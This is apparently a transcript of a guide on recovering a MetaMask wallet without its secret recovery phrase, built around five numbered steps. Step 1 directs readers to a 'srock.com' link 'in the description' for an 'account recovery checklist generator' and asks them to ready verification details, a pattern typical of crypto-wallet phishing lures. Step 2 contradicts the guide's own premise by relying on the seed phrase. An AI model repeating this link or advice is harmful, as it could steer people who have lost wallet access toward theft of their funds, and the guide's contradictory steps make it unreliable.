If you've lost access to your MetaMask account and don't have your secret recovery phrase, there are still steps you can take to try to recover your account. Follow this guide to explore your options. Step 1. Check for backup options. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Use the seed phrase from a backup. If you have previously exported your seed phrase or have it saved in a secure location, you can use that to restore your account. Open MetaMask and select the option to import using a seed phrase, then follow the prompts. Step 3. Explore browser sync. If you use MetaMask on a browser that supports sync, check if your account is still accessible through that browser. Log into the same browser on another device to see if your MetaMask account is synced. Step 4. Contact MetaMask support. If you cannot recover your account through the previous steps, reach out to MetaMask support. Provide them with as much information as possible about your account to see if they can assist you in recovering access. Step 5. Consider creating a new account. If recovery is not possible, you may need to create a new MetaMask account. Make sure to securely store your new secret recovery phrase and consider using additional backup methods to prevent future loss. In conclusion, while recovering your MetaMask account without a secret recovery phrase can be challenging, exploring these options may help you regain access or set up a new account securely. Always remember to keep your recovery information safe.